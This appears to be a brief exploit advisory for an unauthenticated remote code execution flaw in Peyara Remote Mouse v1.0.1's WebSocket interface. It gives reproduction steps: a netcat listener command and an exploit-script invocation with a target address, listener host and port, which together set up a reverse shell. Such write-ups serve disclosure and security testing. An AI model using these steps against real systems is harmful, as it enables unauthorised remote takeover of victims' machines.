
Peyara Remote Mouse v1.0.1- Remote Code Execution (RCE)
Peyara Remote Mouse v1.0.1 contains an unauthenticated remote code execution vulnerability in its WebSocket command interface (port 1313). The application fails to validate or sanitize simulated keyboard input commands received via WebSocket connections, allowing attackers to chain malicious keyboard events that execute arbitrary system commands. This vulnerability can be exploited remotely without authentication to gain full system compromise.
Install Vulnerable Application
Download and install Peyara Remote Mouse on the target Windows system.
Start Netcat Listener
Open a terminal and execute:
nc -nlvp 4444
Execute Exploit Script
python3 Peyara.py --target 192.168.1.107 --lhost 192.168.1.110 --lport 4444

